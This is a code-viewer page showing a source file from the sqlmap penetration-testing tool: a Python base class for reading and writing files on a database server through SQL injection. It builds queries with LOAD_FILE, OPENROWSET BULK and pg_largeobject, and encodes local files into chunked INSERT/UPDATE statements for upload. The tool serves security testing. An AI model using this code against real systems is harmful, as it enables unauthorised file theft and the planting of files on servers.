Book a Demo!
CoCalc Logo Icon
Store | Features | Docs | Share | Support | News | About | Policies | Sign Up | Sign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/plugins/generic/filesystem.py
2989 views
1
#!/usr/bin/env python
2
3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7
8
import codecs
9
import os
10
import sys
11
12
from lib.core.agent import agent
13
from lib.core.common import Backend
14
from lib.core.common import checkFile
15
from lib.core.common import dataToOutFile
16
from lib.core.common import decloakToTemp
17
from lib.core.common import decodeDbmsHexValue
18
from lib.core.common import isListLike
19
from lib.core.common import isNumPosStrValue
20
from lib.core.common import isStackingAvailable
21
from lib.core.common import isTechniqueAvailable
22
from lib.core.common import readInput
23
from lib.core.compat import xrange
24
from lib.core.convert import encodeBase64
25
from lib.core.convert import encodeHex
26
from lib.core.convert import getText
27
from lib.core.convert import getUnicode
28
from lib.core.data import conf
29
from lib.core.data import kb
30
from lib.core.data import logger
31
from lib.core.enums import CHARSET_TYPE
32
from lib.core.enums import DBMS
33
from lib.core.enums import EXPECTED
34
from lib.core.enums import PAYLOAD
35
from lib.core.exception import SqlmapUndefinedMethod
36
from lib.core.settings import UNICODE_ENCODING
37
from lib.request import inject
38
39
class Filesystem(object):
    """
    This class defines generic OS file system functionalities for plugins.
    """

    def __init__(self):
        # Support table (and its single column) used to hold file content
        # on the back-end DBMS
        self.fileTblName = "%sfile" % conf.tablePrefix
        self.tblField = "data"

    def _checkFileLength(self, localFile, remoteFile, fileRead=False):
        """
        Compares the size of the local file with the size of the remote
        file as reported by the back-end DBMS

        Returns True when both sizes match (and also when reading on
        PostgreSQL, where the check is skipped), False when the sizes
        differ or the remote size is not a positive number, None when no
        length query is available for the back-end DBMS
        """

        lengthQuery = None

        if Backend.isDbms(DBMS.MYSQL):
            lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile

        elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
            lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid

        elif Backend.isDbms(DBMS.MSSQL):
            # The remote file is bulk-loaded into the support table first,
            # its length is then taken from the stored value
            self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
            inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))

            lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)

        try:
            localFileSize = os.path.getsize(localFile)
        except OSError:
            warnMsg = "file '%s' is missing" % localFile
            logger.warning(warnMsg)
            localFileSize = 0

        if fileRead and Backend.isDbms(DBMS.PGSQL):
            logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile)
            return True

        if lengthQuery is None:
            # None of the branches above applies to the back-end DBMS:
            # report it instead of failing on an unbound variable
            warnMsg = "unable to check the length of the remote file "
            warnMsg += "'%s' on the back-end DBMS" % remoteFile
            logger.warning(warnMsg)
            return None

        logger.debug("checking the length of the remote file '%s'" % remoteFile)
        remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

        if not isNumPosStrValue(remoteFileSize):
            warnMsg = "it looks like the file has not been written (usually "
            warnMsg += "occurs if the DBMS process user has no write "
            warnMsg += "privileges in the destination path)"
            logger.warning(warnMsg)
            return False

        remoteFileSize = int(remoteFileSize)
        localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
        sameFile = localFileSize == remoteFileSize

        if sameFile:
            infoMsg = "the local file '%s' and the remote file " % localFile
            infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize)
        elif remoteFileSize > localFileSize:
            infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize)
            infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize)
        else:
            infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize)
            infoMsg += "file '%s' (%d B)" % (localFile, localFileSize)

        logger.info(infoMsg)

        return sameFile

    def fileToSqlQueries(self, fcEncodedList):
        """
        Called by MySQL and PostgreSQL plugins to write a file on the
        back-end DBMS underlying file system

        Returns a list of SQL statements: an INSERT for the first encoded
        chunk, then one UPDATE per following chunk appending it to the
        support table field
        """

        sqlQueries = []

        for index, fcEncodedLine in enumerate(fcEncodedList):
            if index == 0:
                sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
            else:
                updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
                sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))

        return sqlQueries

    def fileEncode(self, fileName, encoding, single, chunkSize=256):
        """
        Called by MySQL and PostgreSQL plugins to write a file on the
        back-end DBMS underlying file system

        Reads the local file in binary mode and returns its content as
        encoded by fileContentEncode()
        """

        checkFile(fileName)

        with open(fileName, "rb") as f:
            content = f.read()

        return self.fileContentEncode(content, encoding, single, chunkSize)

    def fileContentEncode(self, content, encoding, single, chunkSize=256):
        """
        Encodes the content with the given encoding and returns it as a
        list of strings

        "hex" values are prefixed with 0x, "base64" values are enclosed in
        single quotes, any other encoding goes through codecs.encode() and
        is left unwrapped. Unless single is set, content longer than
        chunkSize characters is split into chunkSize-sized pieces
        """

        if encoding == "hex":
            content = encodeHex(content)
            template = "0x%s"
        elif encoding == "base64":
            content = encodeBase64(content)
            template = "'%s'"
        else:
            content = codecs.encode(content, encoding)
            template = "%s"

        content = getText(content).replace("\n", "")

        retVal = []

        if not single and len(content) > chunkSize:
            retVal = [template % content[i:i + chunkSize] for i in xrange(0, len(content), chunkSize)]

        # Single value requested, short content or no chunk produced
        if not retVal:
            retVal = [template % content]

        return retVal

    def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
        """
        Checks the size of the written remote file against the local one,
        either unconditionally (forceCheck) or after user confirmation

        Returns the outcome of the size check, True when the check has
        been declined by the user
        """

        choice = None

        if forceCheck is not True:
            message = "do you want confirmation that the local file '%s' " % localFile
            message += "has been successfully written on the back-end DBMS "
            message += "file system ('%s')? [Y/n] " % remoteFile
            choice = readInput(message, default='Y', boolean=True)

        if forceCheck or choice:
            return self._checkFileLength(localFile, remoteFile)

        return True

    def askCheckReadFile(self, localFile, remoteFile):
        """
        Asks the user (unless in brute mode) whether the size of the
        downloaded file should be checked against the remote one

        Returns the outcome of the size check, None when no check has
        been performed
        """

        if not kb.bruteMode:
            message = "do you want confirmation that the remote file '%s' " % remoteFile
            message += "has been successfully downloaded from the back-end "
            message += "DBMS file system? [Y/n] "

            if readInput(message, default='Y', boolean=True):
                return self._checkFileLength(localFile, remoteFile, True)

        return None

    def nonStackedReadFile(self, remoteFile):
        errMsg = "'nonStackedReadFile' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise SqlmapUndefinedMethod(errMsg)

    def stackedReadFile(self, remoteFile):
        errMsg = "'stackedReadFile' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise SqlmapUndefinedMethod(errMsg)

    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        errMsg = "'unionWriteFile' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise SqlmapUndefinedMethod(errMsg)

    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        errMsg = "'stackedWriteFile' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise SqlmapUndefinedMethod(errMsg)

    def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
        # Stub for the technique used by writeFile(), consistent with the
        # other technique methods above
        # NOTE(review): assumes the real implementation lives in the
        # DBMS-specific plugin overriding this class - confirm
        errMsg = "'linesTerminatedWriteFile' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise SqlmapUndefinedMethod(errMsg)

    def readFile(self, remoteFile):
        """
        Reads one or more (comma-separated) remote files and stores their
        content locally

        Returns the list of local file paths, each one annotated with the
        outcome of the optional size check
        """

        localFilePaths = []

        self.checkDbmsOs()

        for remotePath in remoteFile.split(','):
            fileContent = None
            kb.fileReadMode = True

            # The flag is reset even if the chosen technique raises
            try:
                if conf.direct or isStackingAvailable():
                    if isStackingAvailable():
                        debugMsg = "going to try to read the file with stacked query SQL "
                        debugMsg += "injection technique"
                        logger.debug(debugMsg)

                    fileContent = self.stackedReadFile(remotePath)
                elif Backend.isDbms(DBMS.MYSQL):
                    debugMsg = "going to try to read the file with non-stacked query "
                    debugMsg += "SQL injection technique"
                    logger.debug(debugMsg)

                    fileContent = self.nonStackedReadFile(remotePath)
                else:
                    errMsg = "none of the SQL injection techniques detected can "
                    errMsg += "be used to read files from the underlying file "
                    errMsg += "system of the back-end %s server" % Backend.getDbms()
                    logger.error(errMsg)

                    fileContent = None
            finally:
                kb.fileReadMode = False

            if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
                self.cleanup(onlyFileTbl=True)
            elif isListLike(fileContent):
                # Flatten the retrieved rows (first item of each) into a
                # single string, skipping empty ones
                chunks = []

                for chunk in fileContent:
                    if isListLike(chunk):
                        chunk = chunk[0] if len(chunk) > 0 else ""

                    if chunk:
                        chunks.append(chunk)

                fileContent = "".join(chunks)

            if fileContent is not None:
                fileContent = decodeDbmsHexValue(fileContent, True)

                if fileContent.strip():
                    localFilePath = dataToOutFile(remotePath, fileContent)

                    if not Backend.isDbms(DBMS.PGSQL):
                        self.cleanup(onlyFileTbl=True)

                    sameFile = self.askCheckReadFile(localFilePath, remotePath)

                    if sameFile is True:
                        localFilePath += " (same file)"
                    elif sameFile is False:
                        localFilePath += " (size differs from remote file)"

                    localFilePaths.append(localFilePath)
                elif not kb.bruteMode:
                    errMsg = "no data retrieved"
                    logger.error(errMsg)

        return localFilePaths

    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
        """
        Uploads the local file to the back-end DBMS underlying file system
        with the first usable technique (stacked queries, UNION query or
        LINES TERMINATED BY, the latter two on MySQL only)

        Returns the value given by the technique-specific method, None
        when no technique can be used
        """

        written = False

        checkFile(localFile)

        self.checkDbmsOs()

        # File names with a trailing underscore are decloaked to a
        # temporary file first
        if localFile.endswith('_'):
            localFile = getUnicode(decloakToTemp(localFile))

        if conf.direct or isStackingAvailable():
            if isStackingAvailable():
                debugMsg = "going to upload the file '%s' with " % fileType
                debugMsg += "stacked query technique"
                logger.debug(debugMsg)

            written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
            self.cleanup(onlyFileTbl=True)
        elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
            debugMsg = "going to upload the file '%s' with " % fileType
            debugMsg += "UNION query technique"
            logger.debug(debugMsg)

            written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
        elif Backend.isDbms(DBMS.MYSQL):
            debugMsg = "going to upload the file '%s' with " % fileType
            debugMsg += "LINES TERMINATED BY technique"
            logger.debug(debugMsg)

            written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck)
        else:
            errMsg = "none of the SQL injection techniques detected can "
            errMsg += "be used to write files to the underlying file "
            errMsg += "system of the back-end %s server" % Backend.getDbms()
            logger.error(errMsg)

            return None

        return written
325
326